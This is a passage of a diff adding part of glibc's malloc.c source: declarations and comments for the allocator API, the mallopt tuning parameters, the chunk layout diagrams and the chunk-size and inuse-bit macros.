+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
